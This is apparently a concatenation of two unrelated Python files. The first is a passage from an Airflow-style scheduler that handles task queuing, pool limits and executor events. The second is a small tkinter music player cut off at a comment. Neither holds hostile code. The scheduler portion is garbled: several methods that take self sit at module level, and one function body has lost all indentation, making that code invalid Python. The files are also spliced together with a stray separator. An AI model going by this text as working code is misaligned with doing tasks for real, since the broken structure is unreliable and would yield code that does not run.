                    models.TaskInstance.task_id == subq.c.task_id,
                    models.TaskInstance.execution_date ==
                    subq.c.execution_date) \
                .update({models.TaskInstance.state: new_state}, synchronize_session=False)
            session.commit()

        if tis_changed > 0:
            self.log.warning(
                "Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
                tis_changed, new_state
            )
            Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
    # pylint: disable=too-many-locals,too-many-statements
    @provide_session
    def _find_executable_task_instances(
        self,
        simple_dag_bag: SimpleDagBag,
        session: Session = None
    ) -> List[TI]:
        """
        Finds TIs that are ready for execution with respect to pool limits,
        dag concurrency, executor state, and priority.

        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag will be fetched from the DB and executed
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        :return: list[airflow.models.TaskInstance]
        """
        executable_tis: List[TI] = []

        # Get all task instances associated with scheduled
        # DagRuns which are not backfilled, in the given states,
        # and the dag is not paused
        task_instances_to_examine: List[TI] = (
            session
            .query(TI)
            .filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
            .outerjoin(
                DR, and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
            )
            .filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB.value))
            .outerjoin(DM, DM.dag_id == TI.dag_id)
            .filter(or_(DM.dag_id.is_(None), not_(DM.is_paused)))
            .filter(TI.state == State.SCHEDULED)
            .all()
        )
        Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))

        if len(task_instances_to_examine) == 0:
            self.log.debug("No tasks to consider for execution.")
            return executable_tis

        # Put one task instance on each line
        task_instance_str = "\n\t".join(
            [repr(x) for x in task_instances_to_examine])
        self.log.info(
            "%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
            task_instance_str
        )

        # Get the pool settings
        pools: Dict[str, models.Pool] = {p.pool: p for p in session.query(models.Pool).all()}

        # Bucket the candidate TIs by the pool they would consume slots from.
        pool_to_task_instances: DefaultDict[str, List[TI]] = defaultdict(list)
        for task_instance in task_instances_to_examine:
            pool_to_task_instances[task_instance.pool].append(task_instance)

        # dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
        dag_concurrency_map: DefaultDict[str, int]
        task_concurrency_map: DefaultDict[Tuple[str, str], int]
        dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
            states=list(EXECUTION_STATES), session=session)

        num_tasks_in_executor = 0
        # Number of tasks that cannot be scheduled because of no open slot in pool
        num_starving_tasks_total = 0

        # Go through each pool, and queue up a task for execution if there are
        # any open slots in the pool.
        # pylint: disable=too-many-nested-blocks
        for pool, task_instances in pool_to_task_instances.items():
            pool_name = pool
            if pool not in pools:
                self.log.warning(
                    "Tasks using non-existent pool '%s' will not be scheduled",
                    pool
                )
                continue

            open_slots = pools[pool].open_slots(session=session)

            num_ready = len(task_instances)
            self.log.info(
                "Figuring out tasks to run in Pool(name=%s) with %s open slots "
                "and %s task instances ready to be queued",
                pool, open_slots, num_ready
            )

            # Highest priority_weight first; ties broken by earliest execution_date.
            priority_sorted_task_instances = sorted(
                task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))

            num_starving_tasks = 0
            for current_index, task_instance in enumerate(priority_sorted_task_instances):
                if open_slots <= 0:
                    self.log.info(
                        "Not scheduling since there are %s open slots in pool %s",
                        open_slots, pool
                    )
                    # Can't schedule any more since there are no more open slots.
                    num_unhandled = len(priority_sorted_task_instances) - current_index
                    num_starving_tasks += num_unhandled
                    num_starving_tasks_total += num_unhandled
                    break

                # Check to make sure that the task concurrency of the DAG hasn't been
                # reached.
                dag_id = task_instance.dag_id
                serialized_dag = simple_dag_bag.get_dag(dag_id)

                current_dag_concurrency = dag_concurrency_map[dag_id]
                dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
                self.log.info(
                    "DAG %s has %s/%s running and queued tasks",
                    dag_id, current_dag_concurrency, dag_concurrency_limit
                )
                if current_dag_concurrency >= dag_concurrency_limit:
                    self.log.info(
                        "Not executing %s since the number of tasks running or queued "
                        "from DAG %s is >= to the DAG's task concurrency limit of %s",
                        task_instance, dag_id, dag_concurrency_limit
                    )
                    continue

                # Per-task concurrency cap, when the task defines one.
                task_concurrency_limit: Optional[int] = None
                if serialized_dag.has_task(task_instance.task_id):
                    task_concurrency_limit = serialized_dag.get_task(
                        task_instance.task_id).task_concurrency

                if task_concurrency_limit is not None:
                    current_task_concurrency = task_concurrency_map[
                        (task_instance.dag_id, task_instance.task_id)
                    ]

                    if current_task_concurrency >= task_concurrency_limit:
                        self.log.info("Not executing %s since the task concurrency for"
                                      " this task has been reached.", task_instance)
                        continue

                if self.executor.has_task(task_instance):
                    self.log.debug(
                        "Not handling task %s as the executor reports it is running",
                        task_instance.key
                    )
                    num_tasks_in_executor += 1
                    continue

                if task_instance.pool_slots > open_slots:
                    self.log.info("Not executing %s since it requires %s slots "
                                  "but there are %s open slots in the pool %s.",
                                  task_instance, task_instance.pool_slots, open_slots, pool)
                    num_starving_tasks += 1
                    num_starving_tasks_total += 1
                    # Though we can execute tasks with lower priority if there's enough room
                    continue

                executable_tis.append(task_instance)
                # Reserve the capacity locally so later candidates see updated counts.
                open_slots -= task_instance.pool_slots
                dag_concurrency_map[dag_id] += 1
                task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1

            Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)

        Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
        Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
        Stats.gauge('scheduler.tasks.executable', len(executable_tis))

        task_instance_str = "\n\t".join(
            [repr(x) for x in executable_tis])
        self.log.info(
            "Setting the following tasks to queued state:\n\t%s", task_instance_str)

        # so these dont expire on commit
        for ti in executable_tis:
            copy_dag_id = ti.dag_id
            copy_execution_date = ti.execution_date
            copy_task_id = ti.task_id
            make_transient(ti)
            ti.dag_id = copy_dag_id
            ti.execution_date = copy_execution_date
            ti.task_id = copy_task_id
        return executable_tis
@provide_session
def _change_state_for_executable_task_instances(
    self, task_instances: List[TI], session: Session = None
) -> List[SimpleTaskInstance]:
    """
    Changes the state of task instances in the list with one of the given states
    to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.

    :param task_instances: TaskInstances to change the state of
    :type task_instances: list[airflow.models.TaskInstance]
    :rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
    """
    # Nothing to do; commit so the session does not keep an open transaction.
    if len(task_instances) == 0:
        session.commit()
        return []
    # Re-select the candidate rows with SELECT ... FOR UPDATE so a concurrent
    # scheduler cannot change them between this check and the UPDATE below.
    # Only rows still in SCHEDULED state remain eligible.
    tis_to_set_to_queued: List[TI] = (
        session
        .query(TI)
        .filter(TI.filter_for_tis(task_instances))
        .filter(TI.state == State.SCHEDULED)
        .with_for_update()
        .all()
    )
    if len(tis_to_set_to_queued) == 0:
        self.log.info("No tasks were able to have their state changed to queued.")
        session.commit()
        return []
    # Set the locked TIs to QUEUED with a single bulk UPDATE.
    # synchronize_session=False is safe: the loaded ORM objects are only used
    # for repr/SimpleTaskInstance conversion below, not for their .state.
    filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
    session.query(TI).filter(filter_for_tis).update(
        {TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow()}, synchronize_session=False
    )
    # Commit releases the row locks taken above.
    session.commit()
    # Generate a list of SimpleTaskInstance for the use of queuing
    # them in the executor.
    simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
    task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
    self.log.info("Setting the following %s tasks to queued state:\n\t%s",
                  len(tis_to_set_to_queued), task_instance_str)
    return simple_task_instances
def _enqueue_task_instances_with_queued_state(
    self,
    simple_dag_bag: SimpleDagBag,
    simple_task_instances: List[SimpleTaskInstance]
) -> None:
    """
    Hand task instances that are already in QUEUED state over to the executor.

    :param simple_dag_bag: Should contains all of the task_instances' dags
    :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
    :param simple_task_instances: TaskInstances to enqueue
    :type simple_task_instances: list[SimpleTaskInstance]
    """
    # Build a run command per TI and push it onto the executor's queue.
    for sti in simple_task_instances:
        dag = simple_dag_bag.get_dag(sti.dag_id)
        run_command = TI.generate_command(
            sti.dag_id,
            sti.task_id,
            sti.execution_date,
            local=True,
            mark_success=False,
            ignore_all_deps=False,
            ignore_depends_on_past=False,
            ignore_task_deps=False,
            ignore_ti_state=False,
            pool=sti.pool,
            file_path=dag.full_filepath,
            pickle_id=dag.pickle_id,
        )
        self.log.info(
            "Sending %s to executor with priority %s and queue %s",
            sti.key, sti.priority_weight, sti.queue
        )
        self.executor.queue_command(
            sti,
            run_command,
            priority=sti.priority_weight,
            queue=sti.queue,
        )
@provide_session
def _execute_task_instances(
    self,
    simple_dag_bag: SimpleDagBag,
    session: Session = None
) -> int:
    """
    Attempts to execute TaskInstances that should be executed by the scheduler.

    There are three steps:
    1. Pick TIs by priority with the constraint that they are in the expected states
       and that we do exceed max_active_runs or pool limits.
    2. Change the state for the TIs above atomically.
    3. Enqueue the TIs in the executor.

    :param simple_dag_bag: TaskInstances associated with DAGs in the
        simple_dag_bag will be fetched from the DB and executed
    :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
    :return: Number of task instance with state changed.
    """
    executable_tis = self._find_executable_task_instances(simple_dag_bag, session=session)

    def query(result: int, items: List[TI]) -> int:
        # Process one chunk: flip SCHEDULED -> QUEUED in the DB, then hand the
        # changed TIs to the executor.  Commit after each chunk so every chunk
        # is persisted independently of the next.
        simple_tis_with_state_changed = \
            self._change_state_for_executable_task_instances(items, session=session)
        self._enqueue_task_instances_with_queued_state(
            simple_dag_bag,
            simple_tis_with_state_changed)
        session.commit()
        return result + len(simple_tis_with_state_changed)

    # Fold `query` over executable_tis in chunks of at most max_tis_per_query,
    # accumulating (starting from 0) the number of TIs whose state changed.
    return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
    """
    If there are tasks left over in the executor,
    we set them back to SCHEDULED to avoid creating hanging tasks.

    :param session: session for ORM operations
    """
    # Nothing still queued in the executor -> nothing to roll back.
    if not self.executor.queued_tasks:
        return
    # One AND-clause per task still sitting in the executor's queue, matching
    # the full TI key and requiring the DB state to still be QUEUED.
    filter_for_ti_state_change = (
        [and_(
            TI.dag_id == dag_id,
            TI.task_id == task_id,
            TI.execution_date == execution_date,
            # The TI.try_number will return raw try_number+1 since the
            # ti is not running. And we need to -1 to match the DB record.
            TI._try_number == try_number - 1,  # pylint: disable=protected-access
            TI.state == State.QUEUED)
            for dag_id, task_id, execution_date, try_number
            in self.executor.queued_tasks.keys()])
    ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
    # Lock the matching rows so a concurrent scheduler cannot race us.
    tis_to_set_to_scheduled: List[TI] = ti_query.with_for_update().all()
    if not tis_to_set_to_scheduled:
        return
    # Set the TIs back to SCHEDULED and clear the queued timestamp so the
    # normal scheduling path picks them up again.
    filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
    session.query(TI).filter(filter_for_tis).update(
        {TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
    )
    # Drop the corresponding entries from the executor's in-memory queue.
    for task_instance in tis_to_set_to_scheduled:
        self.executor.queued_tasks.pop(task_instance.key)
    task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
    self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag: SimpleDagBag, session: Session = None) -> None:
    """
    Respond to executor events.

    Reconciles FAILED/SUCCESS events reported by the executor against the DB
    state of the corresponding task instances; when the DB still says QUEUED,
    a failure callback is sent to the DAG processor agent.

    :param simple_dag_bag: serialized DAGs whose executor events we consume
    :param session: ORM session (injected by @provide_session)
    """
    if not self.processor_agent:
        raise ValueError("Processor agent is not started.")
    ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
    event_buffer = self.executor.get_event_buffer(simple_dag_bag.dag_ids)
    tis_with_right_state: List[TaskInstanceKey] = []
    # Report execution
    for ti_key, value in event_buffer.items():
        state: str
        state, _ = value
        # We create map (dag_id, task_id, execution_date) -> in-memory try_number
        ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
        self.log.info(
            "Executor reports execution of %s.%s execution_date=%s "
            "exited with status %s for try_number %s",
            ti_key.dag_id, ti_key.task_id, ti_key.execution_date, state, ti_key.try_number
        )
        # only terminal states get reconciled against the DB below
        if state in (State.FAILED, State.SUCCESS):
            tis_with_right_state.append(ti_key)
    # Return if no finished tasks
    if not tis_with_right_state:
        return
    # Check state of finished tasks
    filter_for_tis = TI.filter_for_tis(tis_with_right_state)
    tis: List[TI] = session.query(TI).filter(filter_for_tis).all()
    for ti in tis:
        # recover the try_number the executor reported for this TI, and pop
        # the matching event out of the buffer
        try_number = ti_primary_key_to_try_number_map[ti.key.primary]
        buffer_key = ti.key.with_try_number(try_number)
        state, info = event_buffer.pop(buffer_key)
        # TODO: should we fail RUNNING as well, as we do in Backfills?
        if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
            # Executor says finished but the DB still says QUEUED: the task
            # process most likely died or was killed externally.
            Stats.incr('scheduler.tasks.killed_externally')
            msg = "Executor reports task instance %s finished (%s) although the " \
                  "task says its %s. (Info: %s) Was the task killed externally?"
            self.log.error(msg, ti, state, ti.state, info)
            serialized_dag = simple_dag_bag.get_dag(ti.dag_id)
            self.processor_agent.send_callback_to_execute(
                full_filepath=serialized_dag.full_filepath,
                task_instance=ti,
                msg=msg % (ti, state, ti.state, info),
            )
def _execute(self) -> None:
    """Scheduler entry point: start the executor and the DAG-file processor
    agent, run the scheduling loop, then tear everything down."""
    self.log.info("Starting the scheduler")
    # DAGs can be pickled for easier remote execution by some executors
    pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
    self.log.info("Processing each file at most %s times", self.num_runs)
    # When using sqlite, we do not use async_mode
    # so the scheduler job and DAG parser don't access the DB at the same time.
    async_mode = not self.using_sqlite
    processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
    processor_timeout = timedelta(seconds=processor_timeout_seconds)
    self.processor_agent = DagFileProcessorAgent(
        dag_directory=self.subdir,
        max_runs=self.num_runs,
        processor_factory=type(self)._create_dag_file_processor,
        processor_timeout=processor_timeout,
        dag_ids=self.dag_ids,
        pickle_dags=pickle_dags,
        async_mode=async_mode,
    )
    try:
        self.executor.start()
        self.log.info("Resetting orphaned tasks for active dag runs")
        self.reset_state_for_orphaned_tasks()
        self.register_exit_signals()
        # Start after resetting orphaned tasks to avoid stressing out DB.
        self.processor_agent.start()
        execute_start_time = timezone.utcnow()
        # Blocks until the loop decides to exit (all files processed num_runs
        # times) or raises.
        self._run_scheduler_loop()
        # Stop any processors
        self.processor_agent.terminate()
        # Verify that all files were processed, and if so, deactivate DAGs that
        # haven't been touched by the scheduler as they likely have been
        # deleted.
        if self.processor_agent.all_files_processed:
            self.log.info(
                "Deactivating DAGs that haven't been touched since %s",
                execute_start_time.isoformat()
            )
            models.DAG.deactivate_stale_dags(execute_start_time)
        self.executor.end()
        settings.Session.remove()  # type: ignore
    except Exception:  # pylint: disable=broad-except
        # NOTE(review): on an exception above, executor.end() is skipped;
        # only the processor agent is cleaned up in the finally block.
        self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
    finally:
        # always stop the processor agent, even after an exception
        self.processor_agent.end()
        self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
    file_path: str,
    failure_callback_requests: List[FailureCallbackRequest],
    dag_ids: Optional[List[str]],
    pickle_dags: bool
) -> DagFileProcessorProcess:
    """Factory handed to the processor agent: build one DAG-file processor
    for the given file path."""
    processor = DagFileProcessorProcess(
        file_path=file_path,
        dag_ids=dag_ids,
        pickle_dags=pickle_dags,
        failure_callback_requests=failure_callback_requests,
    )
    return processor
def _run_scheduler_loop(self) -> None:
    """
    The actual scheduler loop. The main steps in the loop are:

    #. Harvest DAG parsing results through DagFileProcessorAgent
    #. Find and queue executable tasks
    #. Change task instance state in DB
    #. Queue tasks in executor
    #. Heartbeat executor
    #. Execute queued tasks in executor asynchronously
    #. Sync on the states of running tasks

    Following is a graphic representation of these steps.

    .. image:: ../docs/img/scheduler_loop.jpg

    :rtype: None
    """
    if not self.processor_agent:
        raise ValueError("Processor agent is not started.")
    is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
    # For the execute duration, parse and schedule DAGs
    while True:
        loop_start_time = time.time()
        if self.using_sqlite:
            self.processor_agent.run_single_parsing_loop()
            # For the sqlite case w/ 1 thread, wait until the processor
            # is finished to avoid concurrent access to the DB.
            self.log.debug("Waiting for processors to finish since we're using sqlite")
            self.processor_agent.wait_until_finished()
        serialized_dags = self.processor_agent.harvest_serialized_dags()
        self.log.debug("Harvested %d SimpleDAGs", len(serialized_dags))
        # Send tasks for execution if available
        simple_dag_bag = SimpleDagBag(serialized_dags)
        # A False return means task queueing failed: skip heartbeats and
        # metrics for this iteration and retry on the next one.
        if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
            continue
        # Heartbeat the scheduler periodically
        self.heartbeat(only_if_necessary=True)
        self._emit_pool_metrics()
        loop_end_time = time.time()
        loop_duration = loop_end_time - loop_start_time
        self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
        # sleep between iterations outside unit tests to avoid busy-looping
        if not is_unit_test:
            time.sleep(self._processor_poll_interval)
        if self.processor_agent.done:
            self.log.info(
                "Exiting scheduler loop as all files have been processed %d times", self.num_runs
            )
            break
def _validate_and_run_task_instances(self, simple_dag_bag: SimpleDagBag) -> bool:
    """Queue executable tasks for the harvested DAGs, then heartbeat the
    executor and consume its events.

    :param simple_dag_bag: serialized DAGs harvested this loop iteration
    :return: False when queueing tasks raised (caller should retry), True otherwise.
    """
    have_dags = bool(simple_dag_bag.serialized_dags)
    if have_dags:
        try:
            self._process_and_execute_tasks(simple_dag_bag)
        except Exception as err:  # pylint: disable=broad-except
            self.log.error("Error queuing tasks")
            self.log.exception(err)
            return False

    # Heartbeats run even when there were no DAGs to schedule.
    self.log.debug("Heartbeating the executor")
    self.executor.heartbeat()
    self._change_state_for_tasks_failed_to_execute()
    # Process events from the executor
    self._process_executor_events(simple_dag_bag)
    return True
def _process_and_execute_tasks(self, simple_dag_bag: SimpleDagBag) -> None:
    """Reconcile task-instance states with their DAG runs, then queue and
    enqueue whatever is executable.

    :param simple_dag_bag: serialized DAGs whose task instances are handled
    """
    # Handle cases where a DAG run state is set (perhaps manually) to
    # a non-running state. Handle task instances that belong to
    # DAG runs in those states
    # If a task instance is up for retry but the corresponding DAG run
    # isn't running, mark the task instance as FAILED so we don't try
    # to re-run it.
    self._change_state_for_tis_without_dagrun(
        simple_dag_bag=simple_dag_bag,
        old_states=[State.UP_FOR_RETRY],
        new_state=State.FAILED
    )
    # If a task instance is scheduled or queued or up for reschedule,
    # but the corresponding DAG run isn't running, set the state to
    # NONE so we don't try to re-run it.
    self._change_state_for_tis_without_dagrun(
        simple_dag_bag=simple_dag_bag,
        old_states=[State.QUEUED,
                    State.SCHEDULED,
                    State.UP_FOR_RESCHEDULE,
                    State.SENSING],
        new_state=State.NONE
    )
    # With states reconciled, pick, mark QUEUED and enqueue executable TIs.
    self._execute_task_instances(simple_dag_bag)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
    """Publish per-pool open/queued/running slot gauges to the Stats backend."""
    for name, slot_counts in models.Pool.slots_stats(session).items():
        Stats.gauge(f'pool.open_slots.{name}', slot_counts["open"])
        Stats.gauge(f'pool.queued_slots.{name}', slot_counts[State.QUEUED])
        Stats.gauge(f'pool.running_slots.{name}', slot_counts[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
    # Emit a liveness counter on every scheduler heartbeat
    # (count=1, rate=1 i.e. never sampled away).
    Stats.incr('scheduler_heartbeat', 1, 1)
|
main.py | import os
import threading
import time
import pygame
import tkinter.messagebox
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from pygame import mixer
import mutagen
from mutagen.mp3 import MP3
from mutagen.flac import FLAC
from mutagen.id3 import ID3
# Main application window.
root = Tk()
# Top menu bar attached to the window.
menuBar = Menu(root)
# Install the menu bar so sub-menus can be cascaded onto it below.
root.config(menu=menuBar)
# "File" sub-menu (tearoff=0 hides the dashed detach entry).
subMenu = Menu(menuBar, tearoff=0)
# Backing store for the list box: each entry is the full path + filename.
playlist = []
def browse_file():
    """Ask the user for an audio file and add it to the playlist.

    Sets the global ``filename`` (full path) that the rest of the player reads.
    """
    global filename
    chosen = filedialog.askopenfilename()
    # askopenfilename returns '' when the dialog is cancelled; the original
    # code then added an empty entry to the playlist.
    if not chosen:
        return
    filename = chosen
    statusBar["text"] = filename
    add_to_playlist(os.path.basename(filename))
# clicking on Add Button function
# f is name of song without path
def add_to_playlist(f):
    """Add one song to both the visible list box and the path list.

    :param f: display name of the song (basename, no path)

    The original inserted every entry at index 0 and then incremented a
    local ``index`` that was reset on each call (a no-op), which reversed
    the playlist order.  Appending keeps the list box and the ``playlist``
    path list aligned, in insertion order, as the dead increment intended.
    """
    # show the name in the list box
    playlistbox.insert(END, f)
    # remember the full path (global ``filename``) at the matching position
    playlist.append(filename)
# Attach the "File" menu with its Open / Exit entries.
menuBar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open CTRL+O", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
# About menu - opens new window with information: Title and Copy
def about():
    """Show the About dialog with title and author credit."""
    tkinter.messagebox.showinfo(
        "sarcino music_player", "created by @sarcino")
# "Help" sub-menu; note this rebinds subMenu -- the File menu keeps its own
# reference through the add_cascade call above.
subMenu = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About", command=about)
# initialize mixer which allows us to play music files
mixer.init()
# size of the window after opening
root.geometry("600x350")
# title of the window
root.title("sarcino music_player")
# window icon; r = raw string so the backslash is not treated as an escape
root.iconbitmap(r"images\icon.ico")
# showing total length of song which is playing right now
# lenghtlabel = Label(root, text="")
# lenghtlabel.pack(pady=5)
# label updated once per second by start_count() with the elapsed time
currenttimelabel = ttk.Label(root, text="")
currenttimelabel.pack(pady=5)
def show_details():
    """Read duration/bitrate of the current ``filename`` and start the
    elapsed-time counter thread.

    Sets globals ``bitrate`` (kbps, or "-" when unknown) and ``timeformat``
    (total length as "MM:SS").
    """
    # lower-case the extension so ".MP3" / ".Flac" are recognised too
    # (the original compare was case-sensitive)
    extension = os.path.splitext(filename)[1].lower()
    global bitrate
    if extension == ".mp3":
        audio = MP3(filename)
        total_length = audio.info.length
        bitrate = round(audio.info.bitrate / 1000)
    elif extension == ".flac":
        audio = FLAC(filename)
        total_length = audio.info.length
        bitrate = round(audio.info.bitrate / 1000)
    else:
        # unknown type: let pygame load it and report the length;
        # no bitrate is available this way
        a = mixer.Sound(filename)
        total_length = a.get_length()
        bitrate = "-"
    # split total seconds into minutes and seconds
    mins, secs = divmod(total_length, 60)
    mins = round(mins)
    secs = round(secs)
    global timeformat
    # two-digit minutes:seconds
    timeformat = "{:02d}:{:02d}".format(mins, secs)
    #lenghtlabel["text"] = "Total lenght: " + timeformat
    # run the elapsed-time counter on a background thread so the UI thread
    # is not blocked by the per-second sleep loop
    t1 = threading.Thread(target=start_count, args=(total_length,))
    t1.start()
# counting current time of playing song
# t is our total_length
def start_count(t):
    """Tick once per second while music plays, updating the current-time label.

    Runs on a background thread; reads the global ``paused`` flag set by
    pause_music()/play_music().

    :param t: total length of the song in seconds
    """
    global paused
    current_time = 0
    # mixer.music.get_busy() returns False once playback stops (stop button
    # or end of song), which ends the loop
    while current_time <= t and mixer.music.get_busy():
        if paused:
            # The original spun in a tight loop while paused, burning a full
            # CPU core; sleep briefly before re-checking instead.
            time.sleep(0.4)
            continue
        current_mins, current_secs = divmod(current_time, 60)
        current_mins = round(current_mins)
        current_secs = round(current_secs)
        global timeformat_current
        timeformat_current = "{:02d}:{:02d}".format(
            current_mins, current_secs)
        currenttimelabel['text'] = "current time: " + timeformat_current
        # sleep for one second, then advance the clock by one second
        time.sleep(1)
        current_time = current_time + 1
# play button = play image
def play_music():
    """Resume if paused, otherwise load and play the selected playlist entry."""
    global paused
    if paused:
        # playback resumed from where it was paused
        mixer.music.unpause()
        statusBar["text"] = os.path.basename(
            filename) + " | " + "duration: " + timeformat + " | " + "bitrate: " + str(bitrate) + " kbps"
        paused = False
    else:
        try:
            # when switching song, stop music and wait for one second
            stop_music()
            time.sleep(1)
            # index of the song selected in the list box
            selected_song = playlistbox.curselection()
            selected_song = int(selected_song[0])
            # full path of the selected song
            play_it = playlist[selected_song]
            mixer.music.load(play_it)
            show_details()
            mixer.music.play()
            statusBar["text"] = os.path.basename(
                play_it) + " | " + "duration: " + timeformat + " | " + "bitrate: " + str(bitrate) + " kbps"
        except Exception:
            # The original bare ``except:`` also swallowed SystemExit and
            # KeyboardInterrupt.  Expected failures here: IndexError when
            # nothing is selected, pygame.error when the file cannot load.
            tkinter.messagebox.showerror(
                "Not Found", "music_player couldn't find a file. Please check again.")
# stop button = stop image
def stop_music():
    """Stop playback and clear the paused flag."""
    # ``paused`` is assigned below; without this declaration the assignment
    # created a dead local instead of resetting the module-level flag
    # (the original bug -- the player stayed "paused" after a stop).
    global paused
    mixer.music.stop()
    statusBar["text"] = "playback stopped"
    paused = False
def pause_music():
    """Pause playback; the ``paused`` flag is also read by start_count()."""
    global paused
    # flag first, so the counter thread sees the pause promptly
    paused = True
    mixer.music.pause()
    statusBar["text"] = "playback paused"
def rewind_music():
    # "rewind" = restart the selected song from the beginning by replaying it
    play_music()
def set_vol(val):
    """Scale callback: map the slider's 0-100 string value onto the mixer's
    0.0-1.0 volume range."""
    mixer.music.set_volume(float(val) / 100)
# whether sound is currently muted; toggled by mute_music()
muted = False
def mute_music():
    """Toggle mute: silence + mute icon, or restore 25% volume + volume icon."""
    global muted
    if not muted:
        # silence playback, show the mute picture, drag the slider to 0
        mixer.music.set_volume(0)
        volumeBtn.configure(image=mute)
        scale.set(0)
        muted = True
    else:
        # restore the default 25% volume and the normal volume picture
        mixer.music.set_volume(0.25)
        volumeBtn.configure(image=volume)
        scale.set(25)
        muted = False
# function for deleting song from playlist
def del_song():
    """Remove the selected song from both the list box and the path list."""
    global selected_song
    selection = playlistbox.curselection()
    # curselection() returns an empty tuple when nothing is selected;
    # the original code raised IndexError here
    if not selection:
        return
    selected_song = int(selection[0])
    # delete from the visible list box...
    playlistbox.delete(selected_song)
    # ...and drop the matching path so both lists stay aligned
    playlist.pop(selected_song)
# creating frame for buttons - to be able to align them in one row
# used for play, stop, pause, rewind buttons, mute, volume control
middleframe = Frame(root)
middleframe.pack(anchor="w", pady=5, padx=5)
# frame holding the add/delete playlist buttons, anchored to the right
bottomframe = Frame(root)
bottomframe.pack(anchor="e", pady=5, padx=5)
# double click on name of the song = play music
def left_click(event):
    # event is the Tk event object (unused); double-click plays the selection
    play_music()
# playlist - background of selected song, height in lines, width in characters
#playlistbox = Listbox(root, bd=1, height=10, width=70)
playlistbox = Listbox(root, bd=1, height=10)
# bind double left clicks to playing the selection
playlistbox.bind('<Double-1>', left_click)
# playlistbox.pack(pady=10)
playlistbox.pack()
# relative width and relative height = 100 % of the parent widget => full
# width, starting 170px from the top
playlistbox.place(bordermode=INSIDE, y=170, relwidth=1.0, relheight=1.0)
# add to playlist button
# NOTE: the PhotoImage objects below are kept in module-level names;
# presumably to keep them referenced for the lifetime of the buttons
add = PhotoImage(file="images/add.png")
addItemBtn = ttk.Button(bottomframe, image=add, command=browse_file)
addItemBtn.grid(row=0, column=0, padx=3, pady=0)
# delete from playlist button
delete = PhotoImage(file="images/delete.png")
delItemBtn = ttk.Button(bottomframe, image=delete, command=del_song)
delItemBtn.grid(row=0, column=1, padx=3, pady=0)
# play image - show in the default window
play = PhotoImage(file="images/play.png")
# play button lives in middleframe and triggers play_music
playBtn = ttk.Button(middleframe, image=play, command=play_music)
playBtn.grid(row=0, column=0, padx=3)
# stop image - show in the default window
stop = PhotoImage(file="images/stop.png")
stopBtn = ttk.Button(middleframe, image=stop, command=stop_music)
stopBtn.grid(row=0, column=1, padx=3)
# pause image
pause = PhotoImage(file="images/pause.png")
pauseBtn = ttk.Button(middleframe, image=pause, command=pause_music)
pauseBtn.grid(row=0, column=2, padx=3)
# rewind button
rewind = PhotoImage(file="images/rewind.png")
rewindBtn = ttk.Button(middleframe, image=rewind, command=rewind_music)
rewindBtn.grid(row=0, column=3, padx=3)
# volume control slider (0 = silent, 100 = full volume)
